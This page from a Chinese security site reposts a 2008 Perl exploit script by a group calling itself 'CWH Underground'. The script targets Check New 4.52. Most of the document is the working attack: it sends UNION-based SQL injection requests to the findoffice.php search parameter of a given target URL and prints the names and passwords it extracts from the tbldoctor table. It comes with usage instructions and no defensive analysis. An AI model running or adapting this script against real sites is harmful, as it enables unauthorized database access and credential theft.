首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit
来源:cwh.citec.us 作者:CWH 发布时间:2008-12-04  
#!/usr/bin/perl -w
#=====================================================================
# Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit
#=====================================================================
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /          
#  / XXXXXX /
# (________(            
#  `------'
#
#AUTHOR : CWH Underground
#DATE   : 3 December 2008
#SITE   : cwh.citec.us
#
#
#####################################################
#APPLICATION : Check Up New Generation
#VERSION     : 4.52
#VENDOR      : http://checkup.sourceforge.net/
#DOWNLOAD    : http://downloads.sourceforge.net/checkup/checknew_4.52.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################


use LWP::UserAgent;
use HTTP::Request;

my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

if ($#ARGV+1 != 2)
{
   print "\n==============================================\n";
   print "    Check New Remote SQL Injection Exploit   \n";
   print "                                              \n";
   print "        Discovered By CWH Underground         \n";
   print "==============================================\n";
   print "                                              \n";
   print "  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O \n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
   print "                                              \n";
   print "Usage  : ./xpl.pl <URL to PATH> <Dump Limit>\n";
   print "Example: ./xpl.pl http://www.target.com/checknew 10\n";
   exit();
}

$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
$number = $ARGV[1];

print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "\n[+]Dump Username and Password\n";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $target."/findoffice.php?search=admin%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,Name,0x3a3a,Password,0x3a3a3a),3,4,5,6,7,8,9 from tbldoctor limit 1 offset ".$start."--+and+1=1&Submit=%A4%E9%B9%CB%D2")or die "Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
}
else {
print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
exit;
}
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cain & Abel 4.9.23 (rdp file)
·CPanel version 11.x privilege
·ClamAV < 0.94.2 (JPG File) Sta
·Joomla Component com_jmovies 1
·serv-u7 local exp (php)
·RadAsm <= 2.2.1.4 (.RAP File)
·CMS MAXSITE Component Guestboo
·ccTiddly 1.7.4 (cct_base) Mult
·bcoos 1.0.13 (viewcat.php cid)
·EiD <= 0.92 Malformed PE File
·Maxum Rumpus 6.0 Multiple Remo
·NULL FTP Server 1.1.0.7 SITE P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved